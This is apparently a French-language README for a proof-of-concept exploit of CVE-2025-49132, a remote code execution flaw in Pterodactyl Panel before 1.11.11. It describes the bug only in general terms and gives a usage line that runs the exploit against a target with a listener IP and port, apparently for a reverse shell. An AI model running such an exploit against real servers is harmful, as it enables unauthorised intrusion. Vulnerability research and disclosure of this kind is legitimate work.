
Ce script exploite une vulnérabilité d'exécution de code à distance dans Pterodactyl Panel < 1.11.11
Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-49132, une vulnérabilité d'exécution de code à distance (RCE) affectant Pterodactyl Panel < 1.11.11. Ce PoC a été développé et testé dans un environnement de laboratoire contrôlé à des fins de recherche et d'éducation.
La vulnérabilité provient d'une validation insuffisante des entrées contrôlées par l'utilisateur dans un gestionnaire de requêtes, ce qui permet une interaction involontaire avec le backend. Dans certaines conditions, cela peut conduire à une exécution de commandes à distance.
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>